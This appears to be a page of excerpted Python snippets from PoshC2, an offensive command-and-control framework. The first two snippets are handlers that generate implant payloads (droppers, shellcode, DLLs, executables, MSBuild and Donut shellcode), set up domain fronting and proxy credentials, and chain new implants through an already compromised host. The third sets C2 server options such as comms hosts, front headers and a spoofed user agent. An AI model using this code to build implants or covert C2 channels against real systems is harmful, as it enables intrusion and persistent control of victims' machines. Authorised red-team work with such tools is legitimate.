示例#1
0
def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
    params = re.compile("createnewpayload ", re.IGNORECASE)
    params = params.sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
    domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
    pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")

    comms_url, PayloadCommsHostCount = string_to_array(comms_url)
    domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
    if PayloadCommsHostCount == DomainFrontHeaderCount:
        pass
    else:
        print("[-] Error - different number of host headers and URLs")
        input("Press Enter to continue...")
        clear()

    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            proxyuser = "******" % (creds['Domain'], creds['Username'])
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
        credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()

    urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)

    if shellcodeOnly:
        newPayload.CreateDroppers("%s_" % name)
        newPayload.CreateShellcode("%s_" % name)
    else:
        newPayload.CreateAll("%s_" % name)

    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()
示例#2
0
def do_createdaisypayload(user, command):
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    if ("http://127.0.0.1" in daisyurl):
        daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
    if ("https://127.0.0.1" in daisyurl):
        daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    pbindsecret = PBindSecret
    pbindpipename = PBindPipeName

    daisyurl, daisyurl_count = string_to_array(daisyurl)
    daisyhostheader = ""

    c = 0
    daisyurls = daisyurl.split(",")
    for url in daisyurls:
        if c > 0:
            daisyhostheader += ",\"\""
        else:
            daisyhostheader += "\"\""
        c += 1

    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
                           "", "", "")
    newPayload = Payloads(C2.KillDate,
                          C2.EncKey,
                          C2.Insecure,
                          C2.UserAgent,
                          C2.Referrer,
                          "%s?d" % get_newimplanturl(),
                          PayloadsDirectory,
                          PowerShellProxyCommand=proxynone,
                          URLID=urlId,
                          PBindPipeName=pbindpipename,
                          PBindSecret=pbindsecret)
    newPayload.PSDropper = (newPayload.PSDropper).replace(
        "$pid;%s" % (daisyurl),
        "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
    newPayload.CreateDroppers("%s_" % name)
    newPayload.CreateShellcode("%s_" % name)
    newPayload.CreateRaw("%s_" % name)
    newPayload.CreateDlls("%s_" % name)
    newPayload.CreateEXE("%s_" % name)
    newPayload.CreateMsbuild("%s_" % name)
    newPayload.CreateDonutShellcode("%s_" % name)
    newPayload.BuildDynamicPayloads("%s_" % name)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()
示例#3
0
ImagesDirectory = f"{ResourcesDirectory}images/"
PayloadModulesDirectory = f"{PoshInstallDirectory}/poshc2/server/payloads/"

# Database Config
if config["DatabaseType"].lower() == "sqlite":
    DatabaseType = DBType.SQLite
    Database = f"{PoshProjectDirectory}PowershellC2.SQLite"
elif config["DatabaseType"].lower() == 'postgres':
    DatabaseType = DBType.Postgres
    Database = config["PostgresConnectionString"]
else:
    raise Exception(
        f"Invalid configuration: DatabaseType must be Postgres or SQLite: {DatabaseType}"
    )

PayloadCommsHostString, PayloadCommsHostCount = string_to_array(
    config["PayloadCommsHost"])
DomainFrontHeaderString, DomainFrontHeaderCount = string_to_array(
    config["DomainFrontHeader"])
if PayloadCommsHostCount != DomainFrontHeaderCount:
    raise Exception(
        "[-] Error - different number of host headers and URLs in config.yml")
# Server Config
BindIP = config["BindIP"]
BindPort = config["BindPort"]

# Payload Comms
PayloadCommsHost = PayloadCommsHostString
DomainFrontHeader = DomainFrontHeaderString
Referrer = config["Referrer"]
ServerHeader = config["ServerHeader"]
UserAgent = config["UserAgent"]